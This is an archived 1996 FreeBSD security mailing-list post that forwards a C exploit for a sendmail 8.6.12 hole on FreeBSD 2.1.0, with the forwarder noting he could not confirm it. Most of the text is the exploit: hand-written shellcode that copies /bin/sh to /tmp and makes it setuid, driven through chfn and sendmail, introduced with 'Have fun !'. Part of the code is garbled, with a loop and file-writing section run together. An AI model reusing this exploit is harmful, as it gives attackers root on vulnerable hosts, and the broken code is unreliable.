From owner-freebsd-security Fri Sep 27 02:05:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA22133 for security-outgoing; Fri, 27 Sep 1996 02:05:23 -0700 (PDT) Received: from matrix.wg.camelot.de (root@matrix.wg.camelot.de [195.30.3.17]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA21820 for ; Fri, 27 Sep 1996 02:04:48 -0700 (PDT) Received: (from sec@localhost) by matrix.wg.camelot.de (8.6.12/8.6.12) id BAA24530 for security@freebsd.org; Fri, 27 Sep 1996 01:24:28 +0200 Date: Fri, 27 Sep 1996 01:24:28 +0200 From: Stefan Zehl Message-Id: <199609262324.BAA24530@matrix.wg.camelot.de> To: security@freebsd.org Subject: Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD Newsgroups: wg.lists.bugtraq X-Newsreader: TIN [version 1.2 PL2] Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I could not confirm the following for FreeBSD2.1.0R while running NIS, i will try on a non-NIS machine tomorrow, but i think it might be of interest anyway :) : /* Hi ! */ : /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */ : /* If you have any problems with it, send letter to me. */ : /* Have fun ! */ : /* ----------------- Dedicated to my beautiful lady ------------------ */ : /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */ : #include : main() : { : void make_files(); : make_files(); : system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp"); : } : void make_files() : { : int i,j; : FILE *f; : char nop_string[200]; : char code_string[]= : { : "\xeb\x50" /* jmp cont */ : /* geteip: */ "\x5d" /* popl %ebp */ : "\x55" /* pushl %ebp */ : "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc3(%ebp) */ : "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd7(%ebp) */ : "\xc3" /* ret */ : /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp" : /* 0xffffffc3(%ebp): */ "\x3c" : "chmod a=rsx /tmp/sh" : /* 0xffffffd7(%ebp): */ "\x01" : "-leshka-leshka-leshka-leshka-" /* reserved */ : /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */ : "\xe8\xa5\xff\xff\xff" /* call geteip */ : "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4ffffff,%ebp */ : "\x55" /* pushl %ebp */ : "\x55" /* pushl %ebp */ : "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */ : "\xc3" /* ret */ : "-leshka-leshka-leshka-leshka-" /* reserved */ : "\xa0\xcf\xbf\xef" : }; : j=269-sizeof(code_string); : for(i=0;i\"$1\"\n"); : fprintf(f,"touch -t 2510711313 \"$1\"\n"); : fclose(f); : } CU, Sec -- Jeder Tag an dem du nicht lächelst, ist ein verlorener Tag. (C. Chaplin) Hiroshima '45 Tsjernobyl '86 Windows '95 Black holes are where GOD is dividing by zero